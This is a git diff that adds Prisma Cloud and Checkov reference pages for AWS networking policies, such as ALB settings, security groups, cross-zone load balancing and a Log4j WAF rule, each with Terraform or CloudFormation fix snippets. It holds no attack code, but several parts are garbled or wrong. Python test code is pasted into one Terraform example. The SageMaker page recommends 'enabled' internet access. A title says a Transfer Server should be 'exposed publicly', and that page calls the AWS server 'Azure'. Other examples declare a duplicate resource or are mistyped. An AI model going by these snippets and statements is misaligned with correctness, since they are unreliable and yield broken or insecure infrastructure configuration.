5dd236e7-f0da-4a06-825d-7691cdbf10be + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py[CKV_AWS_131] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Ensure that Drop Invalid Header Fields feature is enabled for your Amazon Application Load Balancers (ALBs) in order to follow security best practices and meet compliance requirements. +If Drop Invalid Header Fields security feature is enabled, HTTP headers with header fields that are not valid are removed by the Application Load Balancer instead of being routed to the associated targets. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_alb +* *Arguments:* drop_invalid_header_fields + + +[source,go] +---- +{ + "resource "aws_alb" "test_success" { + name = "test-lb-tf" + internal = false + load_balancer_type = "network" + subnets = aws_subnet.public.*.id + + drop_invalid_header_fields = true + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones.adoc new file mode 100644 index 000000000..797174771 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones.adoc @@ -0,0 +1,73 @@ +== ALB does not redirect HTTP requests into HTTPS ones + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b7139473-a345-43f5-be2d-6d21681b359b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml[CKV2_AWS_20] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that the behaviour of the Load balancer is redirect any traffic from the encrypted endpoint rather than handling on http or failing to respond. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb, aws_lb_listener +* *Arguments:* _redirect_ of aws_lb_listener + + +[source,go] +---- +{ + " +resource "aws_lb" "lb_good" { +} + + + +resource "aws_lb_listener" "listener_good" { + load_balancer_arn = aws_lb.lb_good.arn + port = "80" + protocol = "HTTP" + + default_action { + type = "redirect" + + redirect { + port = "443" + protocol = "HTTPS" + status_code = "HTTP_301" + } + + + } + +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc new file mode 100644 index 000000000..338f233f2 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc @@ -0,0 +1,68 @@ +== Not all EIP addresses allocated to a VPC are attached to EC2 instances + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ac9f9609-d368-408a-93ba-1da69fe36380 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml[CKV2_AWS_19] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that an Elastic IP (EIP) is allocated for each NAT gateway that you want to deploy within your AWS account. +An EIP address is a static, public IP address designed for dynamic cloud computing. +You can associate an AWS EIP address with any EC2 instance, VPC ENI or NAT gateway. +A Network Address Translation (NAT) gateway is a device that helps enabling EC2 instances in a private subnet to connect to the Internet and prevent the Internet from initiating a connection with those instances. +With Elastic IPs, you can mask the failure of an EC2 instance by rapidly remapping the address to another instance launched in your VPC + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_eip, aws_instance +* *Arguments:* _instance_ and _vpc_ of aws_eip + + +[source,go] +---- +{ + "resource "aws_eip" "ok_eip" { + instance = aws_instance.ec2.id + vpc = true +} + + +resource "aws_instance" "ec2" { + ami = "ami-21f78e11" + availability_zone = "us-west-2a" + instance_type = "t2.micro" + + tags = { + Name = "HelloWorld" + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets.adoc new file mode 100644 index 000000000..e7b20d0c8 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets.adoc @@ -0,0 +1,72 @@ +== Not all NACL are attached to subnets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8eaf1a60-fe3f-4931-a8d4-fa8e84982f94 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml[CKV2_AWS_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Network Access Control Lists (NACLs) are used to allow or deny traffic to and from subnets in a Virtual Private Cloud (VPC) in Amazon Web Services (AWS). +It's important to ensure that all NACLs are attached to subnets because this allows you to set specific rules for controlling inbound and outbound traffic for those subnets. +This can help to improve the security and connectivity of your VPC by allowing you to specify which traffic is allowed to enter or leave your subnets. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_vpc, aws_network_acl, aws_subne +* *Arguments:* s__ubnet_ids__ of aws_network_acl + + +[source,go] +---- +{ + " +resource "aws_vpc" "ok_vpc" { + cidr_block = "10.0.0.0/16" +} + + +resource "aws_subnet" "main" { + vpc_id = aws_vpc.ok_vpc.id + cidr_block = "10.0.1.0/24" +} + + +resource "aws_subnet" "main" { + cidr_block = "10.0.1.0/24" +} + + +resource "aws_network_acl" "acl_ok" { + vpc_id = aws_vpc.ok_vpc.id + subnet_ids = [aws_subnet.main.id] +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc new file mode 100644 index 000000000..48439895c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc @@ -0,0 +1,81 @@ +== Amazon EMR clusters' security groups are open to the world + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c1298129-c701-4548-8395-34043b3e0be5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml[CKV2_AWS_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is generally a good security practice to ensure that the security groups for your Amazon EMR clusters are not open to the world, as this means that the clusters are only accessible from within your private network or from certain approved IP addresses or security groups. +This can help to protect your EMR clusters from unauthorized access, as external parties will not be able to connect to them over the internet. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_emr_cluster and aws_security_group +* *Arguments:* ingress of aws_security_group + + +[source,go] +---- +{ + "resource "aws_emr_cluster" "cluster_ok" { + name = "emr-test-arn" + release_label = "emr-4.6.0" + applications = ["Spark"] + + ec2_attributes { + emr_managed_master_security_group = aws_security_group.block_access_ok.id + emr_managed_slave_security_group = aws_security_group.block_access_ok.id + instance_profile = "connected_to_aws_iam_instance_profile" + } + +} + +resource "aws_security_group" "block_access_ok" { + name = "block_access" + description = "Block all traffic" + + ingress { + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["10.0.0.0/16"] + } + + + egress { + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["10.0.0.0/16"] + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc new file mode 100644 index 000000000..252d1141f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc @@ -0,0 +1,32 @@ +== AWS Redshift cluster is publicly accessible + + +=== Description + +We recommend you ensure your Amazon Redshift Clusters are not publicly accessible. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* publicly_accessible + + +[source,go] +---- +{ + "resource "aws_redshift_cluster" "default" { + cluster_identifier = "tf-redshift-cluster" + database_name = "mydb" + master_username = "foo" + master_password = "Mustbe8characters" + node_type = "dc1.large" + cluster_type = "single-node" ++ publicly_accessible= "false" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc new file mode 100644 index 000000000..2899bbc6b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc @@ -0,0 +1,117 @@ +== Auto scaling groups associated with a load balancer do not use elastic load balancing health checks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d26288c2-7208-4871-9109-fde0c6bae041 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml[CKV2_AWS_15] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +To maintain the availability of the compute resources in the event of a failure and provide an evenly distributed application load ,ensure that your Amazon Auto Scaling Groups (ASGs) have associated Elastic Load Balancers in order. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_autoscaling_group, aws_autoscaling_attachment, aws_elb +* *Arguments:* _autoscaling_group_name_ and _elb_ of aws_autoscaling_attachment + + +[source,go] +---- +{ + "resource "aws_autoscaling_group" "autoscalling_ok" { + max_size = 5 + min_size = 2 + health_check_grace_period = 300 + health_check_type = "ELB" + desired_capacity = 4 + force_delete = true + + lifecycle { + ignore_changes = [load_balancers, target_group_arns] + } + +} + +resource "aws_autoscaling_attachment" "test_ok_attachment" { + autoscaling_group_name = aws_autoscaling_group.autoscalling_ok.id + elb = aws_elb.test_ok.id +} + + +resource "aws_elb" "test_ok" { + name = "foobar-terraform-elb" + availability_zones = ["us-west-2a", "us-west-2b", "us-west-2c"] + + access_logs { + bucket = "foo" + bucket_prefix = "bar" + interval = 60 + } + + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 80 + lb_protocol = "http" + } + + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 443 + lb_protocol = "https" + ssl_certificate_id = "arn:aws:iam::123456789012:server-certificate/certName" + } + + + health_check { + healthy_threshold = 2 + unhealthy_threshold = 2 + timeout = 3 + target = "HTTP:8000/" + interval = 30 + } + + + instances = [aws_instance.foo.id] + cross_zone_load_balancing = true + idle_timeout = 400 + connection_draining = true + connection_draining_timeout = 400 + + tags = { + Name = "foobar-terraform-elb" + } + +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc new file mode 100644 index 000000000..9dc74b4f1 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc @@ -0,0 +1,61 @@ +== AWS SageMaker notebook instance configured with direct internet access feature + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5c0ba8b1-9b88-486f-9fe1-a0eb9071a42b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py[CKV_AWS_122] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +We recommend that Direct Internet Access is *enabled* for an Amazon SageMaker Notebook Instances. +TBA. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sagemaker_notebook_instance +* *Arguments:* direct_internet_access + + +[source,go] +---- +{ + " resource "aws_sagemaker_notebook_instance" "test" { + name = "my-notebook-instance" + role_arn = aws_iam_role.role.arn + instance_type = "ml.t2.medium" ++ direct_internet_access = "Disabled" + + tags = { + Name = "foo" + } + + }", +} +---- +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc new file mode 100644 index 000000000..b603f1e06 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc @@ -0,0 +1,69 @@ +== AWS Elasticsearch is not configured inside a VPC + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02325f3d-6c35-4818-aa69-c09b8fb6e981 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py[CKV_AWS_137] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS Elasticsearch domains that reside within a VPC have an extra layer of security when compared to ES domains that use public endpoints. +Launching an Amazon ES cluster within an AWS VPC enables secure communication between the ES cluster (domain) and other AWS services without the need for an Internet Gateway, a NAT device or a VPN connection and all traffic remains secure within the AWS Cloud. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elasticsearch_domain +* *Arguments:* vpc_options + + +[source,go] +---- +{ + " resource "aws_elasticsearch_domain" "es" { + domain_name = var.domain + elasticsearch_version = "6.3" + + cluster_config { + instance_type = "m4.large.elasticsearch" + } + + ++ vpc_options { ++ subnet_ids = [ ++ data.aws_subnet_ids.selected.ids[0], ++ data.aws_subnet_ids.selected.ids[1], ++ ] + + security_group_ids = [aws_security_group.es.id] + } + + + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc new file mode 100644 index 000000000..7b0faf270 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc @@ -0,0 +1,134 @@ +== AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 551ee7ba-edb6-468e-a018-8774da9b1e85 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py[CKV_AWS_138] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cross-zone load balancing reduces the need to maintain equivalent numbers of instances in each enabled Availability Zone, and improves your application's ability to handle the loss of one or more instances. +This would also guarantee better fault tolerance and more consistent traffic flow. +If one of the availability zones registered with the ELB fails (as result of network outage or power loss), the load balancer with the Cross-Zone Load Balancing activated would act as a traffic guard, stopping any request being sent to the unhealthy zone and routing it to the other zones. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* xyz +* *Arguments:* xyz [this will be for composite checks and will indicate a specific resource] + + +[source,go] +---- +{ + " resource "aws_elb" "test_success" { + name = "foobar-terraform-elb" + availability_zones = ["us-west-2a", "us-west-2b", "us-west-2c"] + access_logs { + bucket = "foo" + bucket_prefix = "bar" + interval = 60 + } + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 80 + lb_protocol = "http" + } + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 443 + lb_protocol = "https" + ssl_certificate_id = "arn:aws:iam::123456789012:server-certificate/certName" + } + + health_check { + healthy_threshold = 2 + unhealthy_threshold = 2 + timeout = 3 + target = "HTTP:8000/" + interval = 30 + } + + instances = [aws_instance.foo.id] + idle_timeout = 400 + connection_draining = true + connection_draining_timeout = 400 + } + + """) + resource_conf = hcl_res['resource'][0]['aws_elb']['test_success'] + scan_result = check.scan_resource_conf(conf=resource_conf) + self.assertEqual(CheckResult.PASSED, scan_result) + + def test_success(self): + hcl_res = hcl2.loads(""" + resource "aws_elb" "test_success" { + name = "foobar-terraform-elb" + availability_zones = ["us-west-2a", "us-west-2b", "us-west-2c"] + access_logs { + bucket = "foo" + bucket_prefix = "bar" + interval = 60 + } + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 80 + lb_protocol = "http" + } + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 443 + lb_protocol = "https" + ssl_certificate_id = "arn:aws:iam::123456789012:server-certificate/certName" + } + + health_check { + healthy_threshold = 2 + unhealthy_threshold = 2 + timeout = 3 + target = "HTTP:8000/" + interval = 30 + } + + instances = [aws_instance.foo.id] ++ cross_zone_load_balancing = true + idle_timeout = 400 + connection_draining = true + connection_draining_timeout = 400 + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc new file mode 100644 index 000000000..edcba705f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc @@ -0,0 +1,54 @@ +== Load Balancer (Network/Gateway) does not have cross-zone load balancing enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 33a49bf7-61f7-40c5-b604-ecd46dfb4094 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LBCrossZone.py[CKV_AWS_152] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cross-zone load balancing is a feature that distributes incoming traffic evenly across the healthy targets in all enabled availability zones. +This can help to ensure that your application is able to handle more traffic and reduce the risk of any single availability zone becoming overloaded and might be impact Load balancer's performance + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb +* *Arguments:* enable_cross_zone_load_balancing + + +[source,go] +---- +{ + "resource "aws_lb" "enabled" { + ... ++ enable_cross_zone_load_balancing = true +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc new file mode 100644 index 000000000..72d191e6b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc @@ -0,0 +1,74 @@ +== Security Groups are not attached to EC2 instances or ENIs + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| df306deb-99ec-42d0-943b-f986854d7656 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml[CKV2_AWS_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Security groups are an important layer of security for Amazon EC2 instances and network interfaces (ENIs). +They act as a virtual firewall for your instances, controlling inbound and outbound traffic to and from your instances. +By attaching security groups to your EC2 instances or ENIs, you can specify which traffic is allowed to reach your instances, and which traffic is blocked. +This can help to protect your instances from unauthorized access and prevent potential security vulnerabilities. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_network_interface, aws_instance, aws_security_group +* *Arguments:* _security_groups_ of aws_instance or aws_security_group + + +[source,go] +---- +{ + "resource "aws_network_interface" "test" { + subnet_id = "aws_subnet.public_a.id" + security_groups = [aws_security_group.ok_sg.id] +} + + +resource "aws_instance" "test" { + ami = "data.aws_ami.ubuntu.id" + instance_type = "t3.micro" + security_groups = [aws_security_group.ok_sg.id] +} + + +resource "aws_security_group" "ok_sg" { + ingress { + description = "TLS from VPC" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = 0.0.0.0/0 + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc new file mode 100644 index 000000000..99f40f09f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc @@ -0,0 +1,69 @@ +== VPC endpoint service is not configured for manual acceptance + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5eb67c68-44e9-49bb-b1bb-5f0a5511b124 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py[CKV_AWS_123] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Configuring your VPC endpoint service for manual acceptance is recommended because it allows you to review and manually approve or reject incoming connection requests to your VPC. +This can be useful for security purposes, as it gives you the ability to review and control which resources are able to connect to your VPC. +By default, VPC endpoint services are configured for automatic acceptance, which means that all incoming connection requests are automatically accepted and allowed to connect to your VPC. +Configuring your VPC endpoint service for manual acceptance allows you to review and selectively approve or reject incoming connection requests, giving you more control over who can access your VPC. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_vpc_endpoint_service +* *Arguments:* acceptance_required + + +[source,go] +---- +resource "aws_vpc_endpoint_service" "example" { + ... ++ acceptance_required = true + network_load_balancer_arns = [aws_lb.example.arn] + } +---- + + +*CloudFormation* + + +* *Resource:* AWS::EC2::VPCEndpointService +* *Arguments:* Properties.AcceptanceRequired + + +[source,yaml] +---- +Type: AWS::EC2::VPCEndpointService + Properties: + ... ++ AcceptanceRequired: true +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly.adoc new file mode 100644 index 000000000..40808c7cf --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly.adoc @@ -0,0 +1,69 @@ +== Ensure Transfer Server is exposed publicly. + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3eec109c-2e42-4875-bdfe-04b2a9999a7b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py[CKV_AWS_164] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +By ensuring that your Azure Transfer Server is not public, you can help protect your data from unauthorized access or tampering. +Public Azure Transfer Servers are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_transfer_server +* *Arguments:* endpoint_type + + +[source,go] +---- +resource "aws_transfer_server" "test" { + + endpoint_type = "VPC" + protocols = ["SFTP"] +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Transfer::Server +* *Arguments:* Properties.EndpointType + + +[source,yaml] +---- +Resources: + VPC: + Type: AWS::Transfer::Server + Properties: + ... ++ EndpointType: "VPC" # or "VPC_ENDPOINT" +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc new file mode 100644 index 000000000..b040108c8 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc @@ -0,0 +1,56 @@ +== AWS VPC subnets should not allow automatic public IP assignment + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 11743cd3-35e4-4639-91e1-bc87b52d4cf5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SubnetPublicIP.py[CKV_AWS_130] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +VPC subnet is a part of the VPC having its own rules for traffic. +Assigning the Public IP to the subnet automatically (on launch) can accidentally expose the instances within this subnet to internet and should be edited to 'No' post creation of the Subnet. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_subnet +* *Arguments:* map_public_ip_on_launch + + +[source,go] +---- +{ + "resource "aws_subnet" "test" { + ... ++ map_public_ip_on_launch = false + }", + + +} +---- +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2.adoc new file mode 100644 index 000000000..ff48100ff --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2.adoc @@ -0,0 +1,104 @@ +== WAF enables message lookup in Log4j2 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| da1c5426-e898-4eac-99d5-a5a45b6e4e6d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py[CKV_AWS_192] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Using a vulnerable version of Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special syntax in a format string which can potentially lead to a risky code execution, data leakage and more. +Set your Web Application Firewall (WAF) to prevent executing such mechanism using the rule definition below. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228] + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_wafv2_web_acl + + +[source,go] +---- +{ + "resource "aws_wafv2_web_acl" "pass" { + ... + + rule { + name = "AWS-AWSManagedRulesKnownBadInputsRuleSet" + priority = 1 + + override_action { + none {} + } + + + statement { + managed_rule_group_statement { + name = "AWSManagedRulesKnownBadInputsRuleSet" + vendor_name = "AWS" + } + + } + + ... + } + + + ... +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::WAFv2::WebACL + + +[source,text] +---- +{ + "Pass: + Type: AWS::WAFv2::WebACL + Properties: + ... + + Rules: + - Name: AWS-AWSManagedRulesKnownBadInputsRuleSet + Priority: 1 + Statement: + ManagedRuleGroupStatement: + VendorName: AWS + Name: AWSManagedRulesKnownBadInputsRuleSet + OverrideAction: + None: {} + ...", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security.adoc new file mode 100644 index 000000000..a6b3a3c54 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security.adoc @@ -0,0 +1,145 @@ +== AWS Security Group allows all traffic on SSH port (22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 617b9138-584b-4e8e-ad15-7fbabafbed1a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py[CKV_AWS_24] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Security groups are stateful and provide filtering of ingress/egress network traffic to AWS resources. +We recommend that security groups do not allow unrestricted ingress access to port 22. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To implement the prescribed state, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/vpc/ [Amazon VPC console]. + +. In the left pane, click * Security Groups*. + +. For each security group, perform the following: a) Select the _security group_. ++ +b) Click * Inbound Rules*. ++ +c) Identify the rules to be removed. ++ +d) Click * X* in the Remove column. + +. Click * Save*. + + +* CLI Command* + + + +. Review the rules for an existing security group (Replacing the security group ID and region). ++ + +[source,shell] +---- +{ + "aws 